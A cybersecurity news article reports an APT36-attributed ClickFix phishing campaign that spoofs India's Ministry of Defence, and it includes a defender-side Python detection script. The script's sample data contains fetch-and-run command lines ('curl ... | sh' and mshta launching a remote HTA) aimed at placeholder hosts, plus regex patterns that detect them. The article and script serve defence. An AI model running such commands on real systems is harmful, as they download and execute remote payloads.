A sophisticated phishing campaign spoofing India’s Ministry of Defence has been uncovered. The operation, which mirrors tactics seen in previous ClickFix-style attacks, appears to be the work of the Pakistan-linked threat group APT36 (Transparent Tribe).
It uses cloned government branding and cross-platform malware delivery to target unsuspecting users.
Deceptive Infrastructure Mimics Official Government Portal
Researchers at hunt.io discovered a fake domain (email.gov.in.drdosurvey[.]info) designed to closely resemble the official Ministry of Defence press release portal. The malicious site mimicked the layout and structure of the real press archive, but with a critical difference: only the link for March 2025 was active, while others displayed a static “No Data” message.
An analysis of the cloned page’s source code revealed it had been created using HTTrack, a website copying tool, with metadata indicating the site was cloned in early March 2025.
ClickFix-Style Infection Chain Targets Windows and Linux
Clicking the sole active link initiated a tailored infection path depending on the visitor’s operating system:
Linux users were directed to a CAPTCHA-themed page displaying a blue button labeled “I’m not a rebot”, a suspicious misspelling that may be designed to bypass automated detection. Clicking the button copied a malicious shell command to the clipboard.
If pasted into a terminal, it downloaded and executed a shell script (mapeal.sh) from a likely compromised domain: trade4wealth[.]in. Though the script’s behavior was minimal (downloading and opening a JPEG image), it demonstrated intent to deceive and possibly laid the groundwork for further activity.
Windows users were served a different lure: a full-screen “For Official Use Only” warning overlaid on a blurred image of the legitimate yoga.ayush.gov.in portal. Clicking “Continue” triggered a JavaScript function that silently copied a command to launch mshta.exe, which executed a remote HTA (HTML Application) file packed with obfuscated JavaScript.
The payload retrieved a .NET-based malware loader that communicated with the IP address 185.117.90[.]212, associated with the spoofed domain email.gov.in.avtzyu[.]store.
While the malware executed in the background, victims were shown a cloned PDF press release, which was likely to reinforce the illusion of legitimacy and reduce suspicion.
Hallmarks of APT36 Activity
Though attribution is not definitive, the campaign bears a strong resemblance to known APT36 tactics, including:
- Cloned Indian government branding and domains
- Use of HTA files and .NET-based malware
- Clipboard-based command execution
- Decoy documents themed on Indian institutions
- Infrastructure leveraging Namecheap registrations and registrar-servers[.]com nameservers
APT36, a Pakistan-aligned threat actor, has historically focused on Indian government, military, and diplomatic targets. The group frequently uses social engineering, spoofed government websites, and malware-laced documents to gain initial access.
A Growing Trend of Infrastructure Spoofing
This operation continues a broader trend of infrastructure spoofing in targeted phishing campaigns, particularly those involving ClickFix-style payload delivery. Key characteristics defenders should monitor include:
- Misspelled CAPTCHAs (“rebot”) and typos in overlays (“officia use only”)
- Commands delivered via clipboard instead of direct download
- Domains spoofing official Indian subdomains (email.gov.in) by using them as the leading labels of attacker-controlled domains (e.g. email.gov.in.drdosurvey[.]info)
- Payloads hosted in typical-looking web asset directories (/assets/js/, /css/default/)
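The characteristics listed above, together with the mshta.exe and clipboard-to-terminal steps of the infection chain, translate into simple defender-side checks. The script below is an added example, not code from the article, from hunt.io, or from any vendor: it runs three heuristics (lookalike-domain detection, payload files in asset-style directories, and process command lines that launch a remote HTA or pipe a download into a shell) over sample telemetry. The two lookalike hostnames are the ones named in the article; every other hostname, URL path, process event, the list of protected domains, and the set of payload extensions beyond .hta and .sh are constructed assumptions for illustration.

```python
"""Detection heuristics for the ClickFix-style indicators described in the article.

Added example: all sample data below is constructed for illustration, except the
two lookalike hostnames quoted from the article. Placeholder hosts use the
reserved .invalid TLD so nothing here resolves.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Domains the spoofed sites imitate (assumption: a defender-maintained list;
# gov.in is the one named in the article, nic.in is an added example).
PROTECTED_DOMAINS = ("gov.in", "nic.in")

# Directories the article names as hiding places, plus payload extensions
# (.hta and .sh are from the article; the rest are assumed additions).
ASSET_DIRS = ("/assets/js/", "/css/default/")
PAYLOAD_EXT = (".hta", ".sh", ".ps1", ".exe", ".bat", ".vbs")

# mshta launched with a URL argument (remote HTA), and a download piped into a shell.
REMOTE_MSHTA = re.compile(r"\bmshta(?:\.exe)?\b.*\bhttps?://", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z|da)?sh\b", re.IGNORECASE)


def is_lookalike_host(host: str) -> bool:
    """True when a protected domain appears as an interior run of labels
    (email.gov.in.drdosurvey.info) but the host is not actually under it."""
    labels = host.lower().rstrip(".").split(".")
    for protected in PROTECTED_DOMAINS:
        plabels = protected.split(".")
        n = len(plabels)
        if labels[-n:] == plabels:
            continue  # genuinely under the protected domain, e.g. pib.gov.in
        for i in range(len(labels) - n):
            if labels[i:i + n] == plabels:
                return True
    return False


def is_payload_in_asset_dir(url: str) -> bool:
    """True when an executable-type file sits under an asset-looking directory."""
    path = urlparse(url).path.lower()
    return any(d in path for d in ASSET_DIRS) and path.endswith(PAYLOAD_EXT)


def classify_process(event: Dict[str, object]) -> Optional[str]:
    """Label a process-creation event, or return None when it looks benign."""
    cmd = str(event.get("cmdline", ""))
    if REMOTE_MSHTA.search(cmd):
        return "mshta-remote-hta"
    if PIPE_TO_SHELL.search(cmd):
        return "download-pipe-to-shell"
    return None


def run_detections(dns_hosts: List[str], urls: List[str],
                   proc_events: List[Dict[str, object]]) -> List[Tuple[str, object]]:
    """Apply all three checks and return (finding, evidence) pairs."""
    findings: List[Tuple[str, object]] = []
    findings += [("lookalike-domain", h) for h in dns_hosts if is_lookalike_host(h)]
    findings += [("payload-in-asset-dir", u) for u in urls if is_payload_in_asset_dir(u)]
    for ev in proc_events:
        label = classify_process(ev)
        if label:
            findings.append((label, ev["pid"]))
    return findings


# Constructed sample telemetry (only the two *.gov.in.* lookalikes come from the article).
SAMPLE_DNS = [
    "email.gov.in.drdosurvey.info",
    "pib.gov.in",
    "cdn.example.invalid",
    "email.gov.in.avtzyu.store",
]
SAMPLE_URLS = [
    "https://host-a.invalid/assets/js/mapeal.sh",
    "https://cdn.example.invalid/assets/js/app.min.js",
    "https://host-b.invalid/css/default/loader.hta",
]
SAMPLE_PROCS = [
    {"pid": 4101, "cmdline": "mshta.exe https://host-b.invalid/css/default/loader.hta"},
    {"pid": 4102, "cmdline": "notepad.exe C:\\Users\\a\\notes.txt"},
    {"pid": 4103, "cmdline": "bash -c 'curl -s http://host-a.invalid/mapeal.sh | sh'"},
]

if __name__ == "__main__":
    for finding, evidence in run_detections(SAMPLE_DNS, SAMPLE_URLS, SAMPLE_PROCS):
        print(f"{finding:24s} {evidence}")
```

The lookalike check deliberately walks labels rather than doing a substring match, so that a legitimate host such as pib.gov.in is never flagged while anything that merely embeds gov.in ahead of another registrable domain is. The process-line patterns are intentionally narrow; in production they would be fed from EDR process-creation events and tuned against the environment's baseline.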
Though the techniques used in this campaign might not be technically advanced, they are a calculated deception. Using visual mimicry, clipboard trickery, and cross-platform targeting, the actors aim to lower defenses and increase malware execution rates.
To defend against threats of this nature, watch for any subtle signs, particularly fake government domains, shallow clones of trusted sites, and payloads embedded in seemingly harmless directories.
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.